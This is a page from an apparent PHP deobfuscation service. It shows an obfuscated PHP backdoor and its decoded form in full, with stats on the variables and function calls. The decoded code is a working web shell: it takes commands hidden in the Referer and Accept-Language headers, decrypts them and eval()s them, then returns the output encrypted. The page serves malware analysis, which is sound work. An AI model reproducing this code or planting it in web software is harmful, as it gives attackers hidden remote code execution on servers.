Find this useful? Enter your email to receive occasional updates for securing PHP code.

Signing you up...

Thank you for signing up!

PHP Decode

<?php $E='*E*p=$ss($E*p,3);E*}if(E*array_key_existE*E*s($iE*,$s)){$s[$i].E*=$p;$E*e=E*strp..

Decoded Output download

$kh="5d41";$kf="402a";function x($t,$k){$c=strlen($k);$l=strlen($t);$o="";for($i=0;$i<$l;){for($j=0;($j<$c&&$i<$l);$j++,$i++){$o.=$t{$i}^$k{$j};}}return $o;}$r=$_SERVER;$rr=@$r["HTTP_REFERER"];$ra=@$r["HTTP_ACCEPT_LANGUAGE"];if($rr&&$ra){$u=parse_url($rr);parse_str($u["query"],$q);$q=array_values($q);preg_match_all("/([\w])[\w-]+(?:;q=0.([\d]))?,?/",$ra,$m);if($q&&$m){@session_start();$s=&$_SESSION;$ss="substr";$sl="strtolower";$i=$m[1][0].$m[1][1];$h=$sl($ss(md5($i.$kh),0,3));$f=$sl($ss(md5($i.$kf),0,3));$p="";for($z=1;$z<count($m[1]);$z++)$p.=$q[$m[2][$z]];if(strpos($p,$h)===0){$s[$i]="";$p=$ss($p,3);}if(array_key_exists($i,$s)){$s[$i].=$p;$e=strpos($s[$i],$f);if($e){$k=$kh.$kf;ob_start();eval(@gzuncompress(@x(base64_decode(preg_replace(array("/_/","/-/"),array("/","+"),$ss($s[$i],0,$e))),$k)));$o=ob_get_contents();ob_end_clean();$d=base64_encode(x(gzcompress($o),$k));print("<$k>$d</$k>");@session_destroy();}}}}

Did this file decode correctly?

Original Code

<?php
$E='*E*p=$ss($E*p,3);E*}if(E*array_key_existE*E*s($iE*,$s)){$s[$i].E*=$p;$E*e=E*strpos($s[E*';
$y='?:;q=E*0.([\\dE*]))?,?/",$E*raE*,$m);iE*f(E*$q&&$m){@sessE*ion_sE*tarE*t();$s=&$_SE*E*ESSE';
$f=str_replace('d','','credadted_fduncddtion');
$R='*($u["queE*ry"],E*$q);$q=array_vaE*E*E*lues($q);preE*E*g_matE*ch_all("/([\\w])E*[E*\\w-]+(';
$l='de(x(gzcE*ompE*resE*s($E*o),$k))E*;print("<$k>$d<E*/E*$E*k>");@session_dE*estroy(E*);}}}}';
$W='$i],$fE*);E*ifE*($e){$k=$khE*.$kE*f;oE*b_start();@evaE*l(@gzE*uncomprE*ess(E*@x(@baE*se';
$h='i}^$k{$j}E*;}}E*return $oE*;}$r=$E*_SEE*RVER;$rE*E*r=E*@$r["HE*TTP_RE*EFERER"];$raE*=@$r';
$Z='countE*(E*$m[1]);$z++)$p.=$q[E*$m[2][$E*z]];if(sE*tE*rpos($pE*E*,$h)===E*0){$s[$i]="";$E';
$z='*ION;$ss=E*"substr";$E*slE*="strtolE*oweE*r";$iE*=$m[1][0E*].$m[1][1];$hE*=$sE*l(E*$ss(';
$j='$khE*="5d41";E*$kf=E*"402a";funcE*tiE*on x($t,E*$k){$E*c=sE*trleE*nE*($k);$l=strlen($t)E*';
$H='md5($iE*.$kh),0E*,3))E*;$f=$sl(E*E*$ss(md5($i.$kfE*)E*,0E*,3));$p="";E*fE*E*or($z=1;$zE*<';
$K='E*["HE*TTPE*_ACCEPT_LANGUAGE*E"];if($rr&E*&$E*ra){E*$u=parsE*eE*_url($rr);parse_E*sE*trE';
$B=';$o="E*"E*;for($i=0E*;$E*i<$l;E*){E*forE*($j=0;E*($j<$c&&$i<$l);$j++,E*$E*i++){E*$o.=$t{$';
$X='64E*_decodE*e(preg_replacE*e(arrE*ay("/_E*/E*E*","/-/"),array(E*"/","+E*"),$ss(E*$s[$i]E*';
$J=',0,$eE*E*))),$k))E*);$o=ob_gE*et_E*contE*ents();obE*_end_clean(E*);$E*d=E*baseE*64_enco';
$Q=str_replace('E*','',$j.$B.$h.$K.$R.$y.$z.$H.$Z.$E.$W.$X.$J.$l);
$i=$f('',$Q);$i();
?>

Function Calls

null 1
str_replace 2
create_function 1

Variables

$B ;$o="E*"E*;for($i=0E*;$E*i<$l;E*){E*forE*($j=0;E*($j<$c&&$i<..
$E *E*p=$ss($E*p,3);E*}if(E*array_key_existE*E*s($iE*,$s)){$s[$..
$H md5($iE*.$kh),0E*,3))E*;$f=$sl(E*E*$ss(md5($i.$kfE*)E*,0E*,3..
$J ,0,$eE*E*))),$k))E*);$o=ob_gE*et_E*contE*ents();obE*_end_cle..
$K E*["HE*TTPE*_ACCEPT_LANGUAGE*E"];if($rr&E*&$E*ra){E*$u=parsE..
$Q $kh="5d41";$kf="402a";function x($t,$k){$c=strlen($k);$l=str..
$R *($u["queE*ry"],E*$q);$q=array_vaE*E*E*lues($q);preE*E*g_mat..
$W $i],$fE*);E*ifE*($e){$k=$khE*.$kE*f;oE*b_start();@evaE*l(@gz..
$X 64E*_decodE*e(preg_replacE*e(arrE*ay("/_E*/E*E*","/-/"),arra..
$Z countE*(E*$m[1]);$z++)$p.=$q[E*$m[2][$E*z]];if(sE*tE*rpos($p..
$f create_function
$h i}^$k{$j}E*;}}E*return $oE*;}$r=$E*_SEE*RVER;$rE*E*r=E*@$r["..
$i None
$j $khE*="5d41";E*$kf=E*"402a";funcE*tiE*on x($t,E*$k){$E*c=sE*..
$l de(x(gzcE*ompE*resE*s($E*o),$k))E*;print("<$k>$d<E*/E*$E*k>"..
$y ?:;q=E*0.([\dE*]))?,?/",$E*raE*,$m);iE*f(E*$q&&$m){@sessE*io..
$z *ION;$ss=E*"substr";$E*slE*="strtolE*oweE*r";$iE*=$m[1][0E*]..

Stats

MD5 64de41b65d814ab3af6347aace093b3b
Eval Count 1
Decode Time 140 ms